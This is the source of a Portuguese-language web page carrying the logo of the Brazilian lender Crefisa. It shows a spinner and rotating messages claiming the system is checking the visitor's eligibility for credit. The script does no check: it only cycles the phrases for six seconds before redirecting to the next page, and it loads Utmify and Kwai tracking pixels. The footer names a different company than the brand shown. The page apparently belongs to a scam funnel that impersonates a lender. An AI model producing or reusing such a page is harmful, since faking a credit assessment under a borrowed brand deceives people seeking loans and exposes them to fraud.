<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        .header {
        background: #38C0E5;
        color: white;
        padding: 15px 0;
        text-align: center;
        font-size: 1.5rem;
        font-weight: bold;
        grid-area: top-bar;
    }
    .main-content {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background: #38C0E5;
            color: white;
            text-align: center;
            flex-direction: column;
        }

        .main-content {
            max-width: 100%;
            padding: 20px;
            border-top: solid 1px #38A0E5;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            margin: 0px auto !important;
            border-radius: 0px !important;
        }

        .loading-content {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        .spinner {
            border: 4px solid rgba(255, 255, 255, 0.3);
            border-radius: 50%;
            border-top: 4px solid white;
            width: 40px;
            height: 40px;
            animation: spin 2s linear infinite;
            margin-bottom: 20px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #e6007e;
            padding: 2rem 0.5rem;
            position: relative;
            margin-top: 50px;
        }
    
    </style>


<!-- Meta Pixel Code -->
<script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script>
  window.pixelId = "66f4c93a69e84de401d813a7";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>
<script src="js/latest.js" data-utmify-prevent-subids="" data-utmify-fast-start="" async="" defer=""></script>
<!-- End Meta Pixel Code -->



<script>
!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.install=t():e.install=t()}(window,(function(){return function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{}};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e,n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject=n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t]=function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];var i=o([t],n,!0);e.push(i)}};i.methods.forEach((function(e){a(i,e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n,e)})),n},i.load=function(e,o){var a="https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js";i._i=i._i||{},i._i[e]=[],i._i[e]._u=a,i._t=i._t||{},i._t[e]=+new Date,i._o=i._o||{},i._o[e]=o||{};var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js"+c)}}(window,document,"kwaiq")}])}));
</script>
<script>
kwaiq.load('510449167530721283');
kwaiq.page();
</script></head>

<body>

<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">   
    <div class="header">
        <img decoding="async" style="width: 120px;" src="images/Crefisa.png" alt="Imagem Centralizada" data-lazy-src="https://upload.wikimedia.org/wikipedia/pt/a/a3/Crefisa.png" data-ll-status="loaded" class="entered lazyloaded"><noscript><img decoding="async" style="width: 120px;" src="https://upload.wikimedia.org/wikipedia/pt/a/a3/Crefisa.png" alt="Imagem Centralizada"></noscript>
    </div>

    <div style="grid-area: content; padding: 0;">
        <div style="margin-top: 40px;" class="main-content">
            <div id="loading-section" class="loading-section" style="display: flex;position: relative;top: -14rem;">
                <div class="loading-content">
                    <div class="spinner"></div>
                    <p id="loading-text" style="font-size: 22px;">Aguarde a resposta do sistema...</p>
                </div>
            </div>
        </div>
    </div>
    
    <script>
        function iniciarCarregamento() {
            const frases = [
                "Buscando a melhor oferta pra você...",
                                "Verificando sua aptidão para receber crédito.",
                "Aguarde a Resposta do Sistema.",
                "Estamos quase lá..."
            ];
            let fraseIndex = 0;
            document.getElementById('loading-section').style.display = 'flex';
            const fraseInterval = setInterval(() => {
                if (fraseIndex < frases.length) {
                    document.getElementById('loading-text').innerText = frases[fraseIndex];
                    fraseIndex++;
                } else {
                    fraseIndex = 0; // Reinicia as frases para continuar o loop
                }
            }, 1000);
            
            setTimeout(() => {
                clearInterval(fraseInterval);
                window.location.href = '../6.1'+ window.location.search; // Substitua pela URL desejada
            }, 6000);
        }

        // Iniciar o carregamento ao carregar a seção
        iniciarCarregamento();
    </script>
   

    <div class="footer py-4" id="footerChg">
       © 2024 Positivo Brasil. CNPJ 36.401.269/0001-27. <br>
         Todos os direitos reservados
    </div>
</div>



</body></html>